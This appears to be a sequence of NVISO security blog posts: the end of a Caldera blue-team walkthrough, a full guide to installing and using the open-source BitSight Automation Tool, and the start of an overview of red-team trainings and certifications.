To form an incident response plan the “blue” user must be logged in.

The blue team’s main menu is slightly different from the red team’s. The main change is the “response” plugin, which is a counterpart of the threat emulation plugins. At the time of writing this blog post, it contains 37 abilities and 4 defender profiles that focus on detection and response actions.

In the “Defenders” tab a new custom defender profile can be created and configured in the same way as the adversary profiles.

Figure 17: Incident Responder Section

The profiles included in this plugin are:

  • Incident Responder
  • Elastic Hunter
  • Query Sysmon
  • Task Hunter

All available abilities for each defender profile can be viewed in the “abilities” section, after the specific profile has been chosen from the “response” tab, as shown in figure 18.

Figure 18: Defender Abilities

Defender abilities are classified by four different tactics:

  • Setup: These abilities prepare information to be used by other abilities
  • Detect: These abilities focus on finding suspicious behavior by continuously monitoring the ingested information and run as long as the operation is active.
  • Response: These abilities act autonomously once suspicious behavior is detected. Such actions include killing a process, modifying firewall rules, deleting a file and so on.
  • Hunt: These abilities focus on searching for Indicators of Compromise (IOCs) via logs or file hashes.

Blue team operations are configured in the same way as red team operations. The main differences in the procedure are that the agent must be deployed as blue instead of red, a defender profile must be selected in the “adversary” option, and the “response” option must be selected in the Fact source section.

Figure 19: Deploy Blue Agent
Figure 20: Configuring A Blue Team Operation

The result structure is the same as the red team operation. The commands and their output are shown and whether they were successful or not.


In conclusion, leveraging the Caldera framework for adversary emulation presents a robust and proactive approach to enhancing cybersecurity defenses. Through the simulation of real-world attack scenarios, organizations can acquire invaluable insights into potential vulnerabilities and subsequently strengthen their incident response capabilities. The flexibility, modularity, and extensibility of Caldera establish it as an ideal tool for executing sophisticated emulation exercises.

By harnessing adversary emulation in conjunction with the Caldera framework, cybersecurity experts are equipped with the means to proactively safeguard their organizations against potential threats.


Konstantinos Pantazis

Konstantinos is a SOC analyst for NVISO security.
When he is not handling alerts, he is usually sharpening his skills for purple teaming.

Introducing BitSight Automation Tool

  1. Glossary
  2. Introduction
  3. BitSight
  4. Automation
    1. Operations
  5. Structure
  6. Installation
    1. Prerequisites
    2. Configuration
    3. Generating an API key for your BitSight account
    4. Adding the API Key to the BitSight Automation Tool
      1. Windows
      2. Linux
    5. The group_mapper.json file
    6. The guid_mapper.json file
    7. Configuring your Company’s structure
      1. The groups.conf file
      2. Letting BitSight Automation Tool handle the rest
    8. Binding into Executable
  7. Execution
    1. Usage
    2. Use Cases
      1. Functional Operation: Rating
      2. Functional Operation: Historical
      3. Functional Operations: Findings
      4. Functional Operation: Assets
      5. Functional Operation: Reverse Lookup
      6. Supplementary Operation: List
      7. Supplementary Operation: Update
    3. Task Scheduler / Cron Jobs
      1. Windows – Task Scheduler
      2. Linux – Cron Jobs
  8. Troubleshooting
    1. Total Risk Monitoring Subscription Required
    2. File not Found *.JSON
  9. Conclusion


  • Entity: A part of an organization that can be assessed as a single figure.
  • Subsidiary: Same as an Entity on BitSight’s side.
  • Group Cluster: A complex structure. It can contain entities/subsidiaries, Groups, or more Group Clusters.
  • Group: A structure that can contain Entities.


In this blog post you will be introduced to the BitSight Automation Tool. BitSight Automation was developed to automate certain manual procedures and extract information such as ratings, assets, findings, etc. Automating most of these tasks is crucial for simplicity and time saving. Besides that, this tool also works well with Scheduled Tasks and cron jobs: you can configure the tool to execute at certain intervals or dates, and retrieve the results from the desired folder without needing to interact with it.


What is BitSight? BitSight is a solution that helps organizations perform three (3) main functions.

  1. Quantify their cyber risk
  2. Measure the impact of their security efforts
  3. Benchmark their performance against peers

It does all that by managing the company’s external-facing infrastructure both automatically and manually, allowing a company to provide updates to BitSight in order to keep its database up to date.

Other functions that are useful and provided by BitSight are:

  • Performing periodic vulnerability assessments on those assets to determine the risk factors and reporting back the findings.
  • Identifying malicious activity, such as botnet infections, that adds to the risk factor.
  • Providing detailed remediation tips to remediate findings.


By utilizing parts of the BitSight API Python wrapper developed by InfosecSapper, we developed an open-source tool for the community to use that fully automates some of BitSight’s operations, which we have named the BitSight Automation Tool. This tool has a lot of potential to expand further with even more operations, based on the needs that might arise.


You might be wondering by this point: what operations can this tool automate? Currently there are 5 operations that can be automated, plus 2 supplementary operations to assist with the tool’s maintenance.

  1. Rating -> Retrieve the current score of an entity and confirm it is above or equal to what your company’s security policies or digital mandate require.
  2. Findings -> Generate a filtered list of vulnerabilities for an entity to remediate.
  3. Assets -> Retrieve the asset count and asset list of an entity, to validate your public IP space.
  4. Reverse Lookup -> Investigate where an IP, IP Range, domain or domain wildcard is attributed to and what IPs or domains it is associated with.
  5. Historical Ratings -> Sets up an overview of ratings for a given entity or group over a specified timeframe (maximum 1 year) to showcase in reports and review progress or regress.
  • List ->  Review the correlation between an entity’s custom given name and BitSight’s given name in a list for all defined entities.
  • Update -> Automatically update the tool and its respective JSON files.


The below image is a representation of the current state of the tool. At the time of writing the tool comes with the following structure.

  • BitSightAPI: This folder contains certain vital Python files from the BitSightAPI Python wrapper.
  • This file contains the instructions on how to parse the tool’s arguments.
  • This file is your friend. It contains all the information on how to execute with examples, as well as troubleshooting advice.
  • This file is the heart of the tool. You can execute this Python file and use it for your Scheduled tasks or cron jobs.
  • group_mapper.json: This file is a JSON structure which represents the mapping of the groups and entities within your organization. (More on this in a dedicated section)
  • guid_mapper.json: This file is a JSON structure which represents the mapping of the entities and their respective GUIDs assigned to them by BitSight. (A GUID is the unique handle used by BitSight to identify your subsidiary)
  • groups.conf: This file is the main configuration to define your groups. It defines the groups which the tool will interact with.
  • requirements.txt: This file indicates all the required libraries for the tool to operate.
Figure 1: Files Diagram



In order to use the tool, we first need to install it. Regardless of the operating system you are using, you will need to have Python installed. The tool has been tested with Python 3.8 and 3.11 at the time of writing, so recent Python 3 versions should work.

Note: When installing Python make sure to include it in your PATH and include the PIP package manager as well.

Next step would be to install the tool’s requirements. To do so, navigate to the tool’s directory within a command prompt / terminal or PowerShell window and execute the following command: `pip install -r requirements.txt`

All the prerequisites are installed at this point, but we still have a couple more steps to perform before we can use the tool.


Now that you have installed the prerequisites, we are one step closer to utilizing the tool. Before we do so, we need to update a couple of files.

Generating an API key for your BitSight account

First you need to generate an API key from your account in BitSight. To do so,

  1. Login to your BitSight account.
  2. On the top right corner of the UI, click on Settings.
  3. Select Account.
  4. Scroll down until you see an “API Token” section.
  5. Select “Generate API Token”.
  6. Copy the newly generated token.

Adding the API Key to the BitSight Automation Tool

In order for the BitSight Automation Tool to use this API key, you need to include it as an environment variable on the system you will be running the tool on. We’ll do so below for both Windows and Linux.


For Windows systems,

  1. Open the search menu.
  2. Search for “Edit the System Environment Variables”.
  3. Select that option.
  4. Select “Environment Variables”.
  5. Under “User Variables”, click “New”.
  6. In the “Variable Name” field, add the value “BITSIGHT_API_KEY”.
  7. In the “Variable Value” field, add the generated token you copied in the previous section.


For Linux systems,

  1. Open a terminal
  2. Replace the “{token}” section with your token, and execute the following command:
echo export BITSIGHT_API_KEY={token} >> ~/.bashrc
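With the variable exported, the tool can read the key at runtime. The following is a minimal sketch of such a lookup using the standard library; the helper name is hypothetical and not part of the tool itself:

```python
import os

def get_api_key() -> str:
    # Read the BitSight API token exported earlier; fail loudly if it is missing.
    key = os.environ.get("BITSIGHT_API_KEY")
    if not key:
        raise RuntimeError("BITSIGHT_API_KEY is not set; see the configuration steps above.")
    return key
```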

The group_mapper.json file

This file is the heart of the tool. It will be queried to retrieve entities for every operation.

An example of a group_mapper.json file can be found below.

      {
        "Root": [
          {"Group1": "Single Entity"},
          {"Cluster Group2": ["EntityOne", "EntityTwo", "EntityThree"]},
          {"Bigger Cluster Group3": [
            {"SubCluster": ["Entity1", "Entity2"]},
            {"SubCluster2": ["EntityUno", "EntityDos"]}
          ]},
          "Random Entity that sits alone under the root"
        ]
      }

Grouped subsidiaries can be organized as shown above. A few rules apply:

  • All of your subsidiaries must be under the “Root” subsidiary. The “Root” Subsidiary is your main subscription in BitSight that contains all the others (if any).
  • The Root subsidiary contains a list of other group subsidiaries or subsidiaries that are directly under the Root.
  • A Group or Group Cluster subsidiary can hold one, or more subsidiaries.
  • You can define bigger Cluster Group subsidiaries that contain even more group subsidiaries, which in turn can contain more subsidiaries.
  • You can create your own Group subsidiaries even if they don’t exist in BitSight for better structuring.
  • You can use your own naming conventions for all your subsidiaries and group subsidiaries without affecting BitSight or the retrieved information.
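To illustrate how such a nested structure can be consumed, here is a small sketch that recursively collects every leaf entity under a node. The function is illustrative only and not the tool’s actual code:

```python
def collect_entities(node):
    """Recursively gather leaf entity names from a group_mapper-style structure."""
    if isinstance(node, str):      # a single entity
        return [node]
    if isinstance(node, dict):     # a group: recurse into its values
        node = list(node.values())
    entities = []
    for child in node:             # a list of entities and/or sub-groups
        entities.extend(collect_entities(child))
    return entities

mapping = {"Root": [
    {"Group1": "Single Entity"},
    {"Cluster Group2": ["EntityOne", "EntityTwo", "EntityThree"]},
]}
print(collect_entities(mapping["Root"]))  # ['Single Entity', 'EntityOne', 'EntityTwo', 'EntityThree']
```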

The guid_mapper.json file

This file is the tie between BitSight and the BitSight Automation Tool. This is where the magic happens: your naming conventions are related back to specific subsidiaries within BitSight.

An example of a guid_mapper.json file can be found below.

    {
      "Root": "463862495-ab29-32829-325829304823",
      "Group1": "463862495-ab29-32829-325829304824"
    }

This structure is the most basic structure you can have. The only thing you have to do is to create a new line for each subsidiary and assign its GUID from BitSight.

Below you may find how to get the GUIDs for the subsidiaries. A few rules apply:

  • The order doesn’t matter.
  • Make sure you use the exact naming convention you used on the group_mapper.json file. (It’s case sensitive)
  • Do not add any lists or other structures in this file. It should be one line for every subsidiary.
  • For groups you added in the group_mapper.json file that do not exist in BitSight, add a line like the following: "{your-group}": "-",
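A sketch of how a name can then be resolved to its GUID, treating the “-” placeholder as “no GUID in BitSight”. The helper is illustrative, not the tool’s internal code:

```python
def resolve_guid(name, guid_map):
    # Names are case sensitive, mirroring the rule above.
    guid = guid_map.get(name)
    return None if guid in (None, "-") else guid

guid_map = {"Root": "463862495-ab29-32829-325829304823", "myTestGroup": "-"}
print(resolve_guid("Root", guid_map))         # the Root GUID
print(resolve_guid("myTestGroup", guid_map))  # None: group exists only locally
```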

Configuring your Company’s structure

This step is mandatory for the tool to operate correctly. You can either use BitSight’s structure or you can create your own that suits best for your company.

Update Example
Figure 2: Update Example

The groups.conf file

Once you have completed the above steps, you need to modify one last item in the configuration of the tool.

The ‘groups.conf’ file structure should look like below (Figure 3)

Groups Modification
Figure 3: Groups Modification

You can add your groups one per line.

Note: Do not modify the first line. It should remain as is [Groups].
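Since groups.conf is a simple INI-style file with a [Groups] header and one bare group name per line, it can be read with Python’s configparser, assuming your file matches the format sketched here (allow_no_value accepts the value-less lines; optionxform preserves case):

```python
from configparser import ConfigParser

parser = ConfigParser(allow_no_value=True)
parser.optionxform = str  # keep the exact casing of the group names
parser.read_string("[Groups]\nTest Group\nmyTestGroup\n")
print(list(parser["Groups"]))  # ['Test Group', 'myTestGroup']
```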

Letting BitSight Automation Tool handle the rest

You have completed the manual part of the configuration! Pretty simple, right?

Execute the tool with the update operation.

python update

This will go through BitSight and find any subsidiaries that are missing. It will then prompt you to include them in the configuration. Follow the steps, provide the required information and the tool will take care of the rest.


PS C:\Users\Konstantinos Pap\Desktop\BitSight Automation> python .\ update

Subsidiary Name – GUID not found in our configuration

Would you like to include it (Y/N)? y
What is the name of this entity? Test
Under which group should this entity fall under({your-groups}) ? myTestGroup
Adding Subsidiary Name with guid {GUID} as Test in myTestGroup

Configuration Updated

Binding into Executable

Before we dive into how to utilize this tool, let’s first look at how we can make an executable bundle for it. Performing this step allows for easier sharing and makes the tool usable by anyone, from analyst to CISO, without any specific requirements. We can use PyInstaller to create the standalone .exe file.

  1. First, open a terminal
  2. Now, we need to install pyinstaller. Use the `pip install pyinstaller` command to download and install pyinstaller.
  3. Afterwards, navigate into the tool’s directory from within the terminal window.
  4. Execute the following command: `pyinstaller -p __pycache__ -F`

Wait for a few seconds and notice there is a new directory created named “dist”. Grab the two .json files and the configuration file and copy them into the dist directory. Zip the contents of that directory and distribute the bundle to any Windows system. It will execute without any need for dependencies.

Note: You still have to export the environment variables to the new machines in order for the tool to be able to connect to BitSight.


Now that we have installed and fully configured the BitSight Automation Tool, we can go ahead and use its capabilities. As we already mentioned, the tool allows for 5 different operations plus 2 supplementary ones to assist with the tool’s maintenance.

We’ll first have a look at the usage menu of the tool and then we’ll navigate over a breakdown of each operation and how it works with examples.


Invoke the tool with its --help attribute.

PS ~/> python .\ --help

usage: [-h] [-g {{your-groups}}] [-e ENTITY] [-v]
                              [-s {All,Critical-High,Critical,High,Low,Medium}]
                              [-so {alphanumerically,alphabetically}] [--search SEARCH] [--months MONTHS]

BitSight Automation tool to automate certain operations like historical report generation, findings categorization, asset list retrieval, reverse lookup of IP addresses and current ratings for entities

positional arguments:
                        The operation to perform.

optional arguments:
  -h, --help            show this help message and exit
  -g {{your-groups}}, --group {{your-groups}} The group of entities you want to query data for.
  -e ENTITY, --entity ENTITY A specific entity you want to query data for
  -v, --verbose         Increase output verbosity
  -s {All,Critical-High,Critical,High,Low,Medium}, --severity {All,Critical-High,Critical,High,Low,Medium}
                        Level of Severity to be captured
  -so {alphanumerically,alphabetically}, --sort {alphanumerically,alphabetically}
                        Sort rating results either alphanumerically or alphabetically.
  --search SEARCH       IP or Domain to reverse lookup for.
  --months MONTHS       Add in how many months back you want to view data for. If you want 1 year, fill in 12 months.
                        Max is 12

For any questions or feedback feel free to reach out to [email protected]

Use Cases

Now we will go through a breakdown of all the different use cases within the BitSight Automation Tool. We’ll go through the functional operations first and leave the 2 supplementary ones for the end.

For every operation different arguments will be required or not needed. The tool will let you know if you missed something during runtime. Example output:

[-] You need to specify one of the arguments --country or --region.

Functional Operation: Rating

Use the rating operation to retrieve the current score of an entity or group in order to confirm that it’s above or equal to your policies. If a group is supplied, this operation will output all of the subsidiaries under the specified group in the order you specified them in the JSON files. (You also have the option to sort them alphanumerically.)

Let’s try to fetch the current rating for our “Test” subsidiary.

PS ~/> python .\ rating -e Test

Test - 790
[+] Data saved to: 2023-03-17_bitsight_rating_Test.txt

Our Test Subsidiary has a score of 790. That’s an advanced score, so we can cross-verify with the company’s policies and take further action if needed. The results are also saved as a TXT file to allow easy copy/paste if required.
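Under the hood, a rating lookup is an authenticated API call. The endpoint path and Basic-auth scheme below are assumptions based on BitSight’s public API conventions, not taken from the tool itself:

```python
import base64
import urllib.request

API_BASE = "https://api.bitsighttech.com"  # assumed base URL

def rating_request(guid: str, token: str) -> urllib.request.Request:
    """Build an authenticated GET for a subsidiary's company record (assumed endpoint)."""
    req = urllib.request.Request(f"{API_BASE}/ratings/v1/companies/{guid}")
    # The API token is commonly sent as the Basic-auth username with an empty password.
    cred = base64.b64encode(f"{token}:".encode()).decode()
    req.add_header("Authorization", f"Basic {cred}")
    return req
```

Sending the request and extracting the rating from the JSON response is left out, since the exact field names vary by API version.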

We can do the same thing for our Group and retrieve all the scores from all subsidiaries under our “Test Group”.

PS ~/> python .\ rating -g “Test Group”

[*] This may take a moment. Grab a coffee
Working on Test Group...
Test Group – 660
EntityOne - 620
Test Entity 2 - 760
EntityTwo - 770
[+] Data saved to: 2023-03-17_bitsight_rating_Test Group.txt

Notice we have retrieved ratings for all subsidiaries under “Test Group”, along with the rating of “Test Group” itself. Some additional notes:

  • If “Test Group” didn’t have a GUID, the tool would not pull any data for it.
  • You can change the sorting algorithm using the -so argument.
  • You can retrieve the rating of “Test Group” without having to go through its subsidiaries. To do so, treat it like a normal entity, supplying it with the -e argument instead.
  • If your group is a big cluster group containing more groups that contain more subsidiaries, the tool will recursively query BitSight for all the groups and subsidiaries under the cluster group. (In other words, nothing will be skipped.)
  • You can use -g {Root} to retrieve ratings for all the subsidiaries in your company. (Replace {Root} with the name you have given it.)

Functional Operation: Historical

Use the historical operation to set up an overview of ratings for a given subsidiary or group over a specified timeframe (maximum 12 months) to showcase in reports and review progress or regress. Typically this operation is used with the -g argument but you can also utilize the -e argument for a given subsidiary only.

Let’s try to generate a report for our previous “Test Group” and its subsidiaries for the past year.

PS ~/> python .\ historical -g “Test Group” --months 12

Grab a coffee, this will take a while...
Working on Test Group...
[+] Data saved to 2023-03-17_Test Group_bitsight_historical_ratings_12_months.xlsx

Note: This command might take some time depending on the size of your organization and the number of subsidiaries it has to query data for. In any case, it is verbose enough to let you know which group it is working on at any time, so if you supplied a big cluster group you would have real-time output of the progress.

The report:

Historical Report
Figure 4: Historical Report

There is a legend in the second sheet (tab) of the Excel file that denotes what these colors are and their scores – aligned with BitSight’s ratings and color coding.

Historical Score Indication
Figure 5: Historical Score Indication

Note: You can generate these types of reports with no limitation to a number of subsidiaries. You can even generate it for the entire organization using the Root subsidiary.
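The --months window maps naturally onto a list of month boundaries. Here is a small sketch of how the last N month starts can be computed; it is illustrative, and the tool’s real date handling may differ:

```python
from datetime import date

def month_starts(months_back: int, today: date) -> list:
    """First day of each of the last `months_back` months (capped at 12), oldest first."""
    months_back = min(months_back, 12)  # the tool caps the window at one year
    year, month = today.year, today.month
    starts = []
    for _ in range(months_back):
        starts.append(date(year, month, 1))
        month -= 1
        if month == 0:               # roll over into the previous year
            month, year = 12, year - 1
    return sorted(starts)

print(month_starts(3, date(2023, 3, 17)))
```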

Functional Operations: Findings

Use the findings operation to generate a filtered list of vulnerabilities for a subsidiary to remediate. This operation works solely with subsidiaries and not groups! You also need to supply the severity level with the -s argument.

Note: Your subsidiaries need to have a ‘Total Risk Monitoring’ subscription for this command to work. Otherwise it will produce an error.

Let’s retrieve the findings for our ‘EntityOne’ subsidiary under ‘Test Group’ we used earlier. We will retrieve the Critical vulnerabilities only.

PS ~/> python .\ findings -e EntityOne -s Critical

[+] Data saved to bitsight_Critical_findings_EntityOne_2023-03-17.csv

Critical findings were downloaded and saved to a file called ‘bitsight_Critical_findings_EntityOne_2023-03-17.csv’. You can now start working on remediating the findings or assign it to the proper internal team.
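The severity choices from the usage menu can be modeled as simple sets, so filtering downloaded findings becomes one comprehension. This is an illustrative sketch, not the tool’s internal logic:

```python
# Map each -s choice to the severity labels it should keep.
SEVERITY_SETS = {
    "All": {"critical", "high", "medium", "low"},
    "Critical-High": {"critical", "high"},
    "Critical": {"critical"},
    "High": {"high"},
    "Medium": {"medium"},
    "Low": {"low"},
}

def filter_findings(findings, severity):
    """Keep only findings whose severity matches the chosen -s level."""
    wanted = SEVERITY_SETS[severity]
    return [f for f in findings if f.get("severity", "").lower() in wanted]

sample = [{"severity": "Critical"}, {"severity": "Medium"}]
print(filter_findings(sample, "Critical-High"))  # [{'severity': 'Critical'}]
```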

Functional Operation: Assets

Use the assets operation to retrieve the asset count and asset list of a subsidiary in order to validate your public IP space. This operation works solely with subsidiaries and not groups. This is a two-step process of querying. The operation first queries BitSight to retrieve the total count of public IPs in your subsidiary and then queries for the detailed asset list.

Note: This command requires a ‘Total Risk Monitoring’ subscription. If one is not available this command will produce an error.

Let’s attempt to retrieve the asset list for our ‘EntityOne’ subsidiary from the previous examples.

PS ~/ > python .\ assets -e EntityOne

EntityOne - 1410
*********** Asset List ************
[+] Asset List saved to: bitsight_asset_list_EntityOne_2023-03-17.csv

Note: This command will only fetch assets that are correctly attributed to this subsidiary. There’s a difference between correctly attributed by BitSight and internal/private Tagging.
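The two-step query pattern (count first, then the detailed list) pairs with BitSight’s paginated responses, whose shape (`links.next`, `count`, `results`) also shows up in the troubleshooting output later in this post. A generic follow-the-next-link sketch, where the `fetch` callable is an assumption standing in for the real HTTP layer:

```python
def paginate(fetch, url):
    """Collect all `results` by following `links.next` until it is None."""
    results = []
    while url:
        page = fetch(url)
        results.extend(page.get("results", []))
        url = page.get("links", {}).get("next")
    return results

# Fake two-page response for demonstration:
pages = {
    "p1": {"links": {"next": "p2"}, "results": [{"ip": "10.0.0.1"}]},
    "p2": {"links": {"next": None}, "results": [{"ip": "10.0.0.2"}]},
}
print(paginate(pages.get, "p1"))  # [{'ip': '10.0.0.1'}, {'ip': '10.0.0.2'}]
```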

Functional Operation: Reverse Lookup

Use this command to investigate where an IP, IP range, domain or domain wildcard is attributed and what IPs or domains it is associated with. This command only requires the --search argument.

Let’s attempt to find out where our domain is attributed to and what public IPs it is associated with.

PS ~/> python .\ reverse_lookup --search -

['<Redacted XX.XXX.XX.XXX>']: Found in: EntityOne
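Conceptually, a reverse lookup checks each entity’s attributed assets for a match. The matching logic below (CIDR containment plus a naive domain-wildcard check) is purely illustrative; the actual tool queries BitSight instead:

```python
import ipaddress

def find_attribution(target, asset_map):
    """Return entities whose assets (CIDRs or domain wildcards) cover `target`."""
    hits = []
    for entity, assets in asset_map.items():
        for asset in assets:
            try:
                # IP case: does the asset network contain the target address?
                if ipaddress.ip_address(target) in ipaddress.ip_network(asset, strict=False):
                    hits.append(entity)
                    break
            except ValueError:
                # Not an IP pair: fall back to exact or wildcard domain matching.
                if target == asset or target.endswith("." + asset.lstrip("*.")):
                    hits.append(entity)
                    break
    return hits

assets = {"EntityOne": ["10.0.0.0/24", "*.example.com"]}
print(find_attribution("10.0.0.5", assets))        # ['EntityOne']
print(find_attribution("www.example.com", assets)) # ['EntityOne']
```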

Supplementary Operation: List

Use this operation to review the correlation between an entity’s custom given name and BitSight’s given name in a list for all defined entities. This command does not require any arguments.

Let’s view our subsidiaries and their correlation to BitSight.

PS ~/> python .\ list

Listing Configuration...
Root – My Test BitSight Organization
Group One – First Group Subsidiary
EntityOne – Entity1 Test
Test Entity 2 – Entity 2 Test
EntityTwo – SSEntity 2

Note: The mapping is {my JSON representation – BitSight’s representation}. The two names are bound over the GUID unique value for a subsidiary.

Supplementary Operation: Update

Use this operation to automatically update the tool and its respective JSON files. We already saw how this command works in the configuration section.

Task Scheduler / Cron Jobs

As we already mentioned, we can either execute the BitSight Automation Tool manually or set it up to execute automatically on a recurring schedule. This is relatively easy to achieve on both Linux and Windows operating systems.

Windows – Task Scheduler

To achieve this in Windows we need to utilize the Task Scheduler utility provided by Microsoft itself. No need to download or install any additional software. Let’s configure it.

  1. Open the Task Scheduler.
  2. On the top left, select “Task Scheduler Library”. (Figure 6)
Task Scheduler Library
Figure 6: Task Scheduler Library
  3. On the top right, select “Create Basic Task”.
Create Basic Task
Figure 7: Create Basic Task
  4. Write down a name and description like below:
Creating Basic Task
Figure 8: Creating Basic Task
  5. Then click “Next”.
  6. Select a Monthly Trigger and click Next.
Selecting Interval
Figure 9: Selecting Interval
  7. Next, select the dates you wish to execute on. I will select all months, run on every 1st Monday of the month, and click Next.
Selecting TimeFrame
Figure 10: Selecting Timeframe
  8. Choose “Start a Program” and click Next.
Selecting Action
Figure 11: Selecting Action
  9. Browse to the bitsight_automation.exe file you created earlier for the “Program/Tool” field. For the arguments field, supply “historical -g {your-group} --months XX”, replacing {your-group} with the group you wish to execute for and XX with how many months back you want. (Remember, it’s up to 12 months maximum.) For the “Start in (Optional)” field, add the path to the executable. This is required because the BitSight Automation Tool expects the JSON files in the same directory it is executing from. Finally, click Next.
Configuring the Program and Arguments
Figure 12: Configuring the Program and Arguments
  10. Verify all is correct and click on Finish.

Your scheduled task is ready. You can manually invoke it once to verify it’s working correctly from the right bar by selecting ‘Run’.

Running the task
Figure 13: Run

Note: You can follow this procedure for other tasks as well. (Update is excluded, as it requires manual intervention. However, the shell or prompt that opens will be interactive, so you can issue update commands on a daily basis anyway and interact with the tool if anything is found.)

Linux – Cron Jobs

The same process can be set up on Linux as well, using the cron jobs it offers.

Write the following new line into the “/etc/crontab” file and replace ‘{your-tool-directory}’ with your tool’s directory (i.e. /opt/bitsight):

10 9 1 * * kali cd {your-tool-directory} && python historical -g Root --months 12

This will execute the tool every first of the month at 9:10 in the morning.


While executing this tool you might run into some issues here and there. This section will go over the 2 most common notifications you might encounter while using BitSight Automation.

Total Risk Monitoring Subscription Required

You may have noticed that a couple of operations carry a note saying “This operation requires a ‘Total Risk Monitoring’ subscription to work. Otherwise it will produce an error”. These errors are usually encountered in the Findings and Assets operations.

If we remove the ‘Total Risk Monitoring’ subscription from EntityOne and execute the findings operation on it again, we will run into the following error:

PS ~/> python .\ findings -e EntityOne -s Critical

It appears as there are no findings in EntityOne or there is something wrong with the API. Please validate the old fashioned way using your browser.
More Details: list index out of range
It might be the case you do not have a 'Total Risk Monitoring' subscription. The 'Risk Monitoring' subscription is unable to work with the API for this operation

Response: {'links': {'next': None, 'previous': None}, 'count': 0, 'results': []}

File not Found *.JSON

In case you execute the tool and it reports back with “File not found”, it means that the necessary files were somehow deleted. In order to resolve this issue, you need to create the files again with the text “{}” inside them.

PS ~/> python .\ findings -e EntityOne -s Critical

File not found:  'group_mapper.json'. Please copy the  'group_mapper.json' to the same directory as this tool and try again.
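The fix can be scripted: recreate any missing mapper file with an empty JSON object, matching the “{}” advice above. This is a sketch; the function name and path handling are assumptions:

```python
from pathlib import Path

def ensure_config_files(directory: Path) -> None:
    """Recreate group_mapper.json / guid_mapper.json with empty JSON if deleted."""
    for name in ("group_mapper.json", "guid_mapper.json"):
        path = directory / name
        if not path.exists():
            path.write_text("{}")
```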


This blog post presented the BitSight Automation Tool as a valuable enhancement for organizations that employ BitSight as their solution for performing external assessments and reducing exposure.

Some key perks of this tool are as follows:

  1. Automates a lot of operations that otherwise are time consuming.
    1. Rating -> Retrieve the current score of an entity and confirm it’s above or equal to your company’s required security policies or digital mandate.
    2. Findings -> Generate a filtered list of vulnerabilities for an entity to remediate.
    3. Assets -> Retrieve the asset count and asset list of an entity, to validate your public IP space.
    4. Reverse Lookup -> Investigate where an IP, IP Range, domain or domain wildcard is attributed to and what IPs or domains it is associated with.
    5. Historical Ratings -> Sets up an overview of ratings for a given entity or group over a specified timeframe (maximum 1 year) to showcase in reports and review progress or regress.
  2. Allows the possibility to configure scheduled executions of the tool and create monthly/daily/yearly reports per your needs.
  3. Provides an easy to use command interface. It can also be compiled as an executable version to avoid having to install dependencies and to make it usable by anyone. (From analysts to CISO.)
Konstantinos Papanagnou

Konstantinos is a Senior Cybersecurity Consultant at NVISO Security.

With a background in software engineering, he has an extensive set of skills in coding which helps him in day-to-day operations even in the Cybersecurity area. His motto; “Better spend 5 hours debugging your automation, than 5 minutes performing an automatable task”.

Unlocking the power of Red Teaming: An overview of trainings and certifications

Title Image

NVISO enjoys an excellent working relationship with SANS and has been involved as Instructors and Course Authors for a variety of their courses.

As technology continues to evolve, so do the tactics and techniques used by cyber criminals. This means that staying up to date as a red team operator is crucial for protecting customers against the constantly changing threat landscape. Red team operators are tasked with simulating real-world attacks on a customer’s system to identify weaknesses and vulnerabilities before they can be exploited by malicious actors. By staying informed about the latest attack methods and trends, red team operators can provide more effective and relevant testing that accurately reflects the current threat landscape. Additionally, keeping up with emerging technologies and security measures can help red team operators develop new tactics and strategies to better protect customers from potential cyberattacks.

While red teams are primarily responsible for simulating attacks and identifying vulnerabilities, blue teams play a critical role in defending against these attacks and protecting an organization’s assets. Attending trainings that are typically attended by red teams can provide valuable insights and knowledge that blue teams can use to better defend their organization. By understanding the latest attack methods and techniques, blue teams can develop more effective defense strategies, identify potential vulnerabilities and patch them before they can be exploited by attackers. Additionally, attending these trainings can help blue teams better understand the tactics and tools used by red teams, allowing for more effective collaboration and communication between the two teams. Overall, attending red team training can help blue teams stay informed and prepared to defend against the constantly evolving threat landscape.


If you do not have much time at hand, do not worry; the following tables may provide you with a quick overview:

Certification Name | Beginner | Intermediate | Expert
Red Team Ops (CRTO1)🔑
Red Team Ops II (CRTO2)🔑
Certified Red Team Professional (CRTP)🔑
Certified Red Team Expert (CRTE)🔑
Certified Red Team Master (CRTM)🔑
Certified Az Red Team Professional (CARTP)🔑
Training Name | Beginner | Intermediate | Expert
Malware on Steroids🔑
Red Team Operations and Adversary Emulation (SEC565)🔑
Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection (SEC699)🔑
RED TEAM Operator: Malware Development Essentials Course🔑
RED TEAM Operator: Malware Development Intermediate Course🔑
RED TEAM Operator: Malware Development Advanced – Vol.1🔑
Corelan “BOOTCAMP” – stack exploitation🔑


It is important to note that the certifications and trainings included in the review are not an exhaustive list of all the options available and are not in a specific order.
While the ones highlighted in the review are all excellent and worth considering, there may be other certifications and trainings that could also be beneficial for your specific needs and goals.
It is always essential to do your own research and carefully consider your options before deciding. Ultimately, the best certification or training for you will depend on your individual circumstances, interests, and career aspirations.


Red Team Ops – CRTO1

The Red Team Ops 1 course is a very well done certification that teaches you the basic red team operator principles, adds handy tools for the beginning and shows techniques you will use as a red team operator.

You will learn how to start and configure the team server (in the course of the certification, Cobalt Strike from FORTRA), how to manage listeners, and the basics of payload generation.

The certification is a must for beginners who want to learn how to go from initial compromise to lateral movement and, in the end, taking over the whole domain.

Of course, Microsoft Defender (not Defender ATP/MDE) and application whitelisting are also part of the course, to prepare you for the much-needed evasion in customer environments by using the artifact and resource kit available with Cobalt Strike.

Who should take this course?

If you are new to the game, this course is made for you! If you already have infrastructure security assessment experience, this course adds new attack paths to your inventory and includes some important tips for OPSEC, which in red team engagements differs a lot from what you know from internal security assessments, where stealth is optional.

I enjoyed the exam a lot, and in comparison to the price of SANS certifications this is also a great opportunity for someone on a tighter budget. Thanks, Zeropoint Security!

Associated costs

365 GBP = 415,32 EUR = 452,89 USD (as of 04/04/2023)

The price includes the course materials as well as a voucher for the first exam attempt.

The RTO lab is sold as a subscription to those who have purchased the course.

The price is 20/40/60 GBP per month for 40/80/120 hours of runtime respectively.

Red Team Ops II – CRTO2

The Red Team Ops 2 course aims to build on the foundation of the Red Team Ops course in order to help you improve your OPSEC skills and show you ways to bypass more defense mechanisms.

It is important to note that this course is NOT a newer version or a replacement of the first course.

The course will introduce the concept of public redirectors and rewrite rules to you, which can then be applied in the wild.

To help you understand the evasion techniques, some common Windows APIs are being covered as well as P/Invoke and D/Invoke which allow you to dynamically invoke unmanaged code and avoid API hooks.

Other indicators such as RWX memory regions and suspicious command lines will be treated with PPID and Command Line Spoofing.

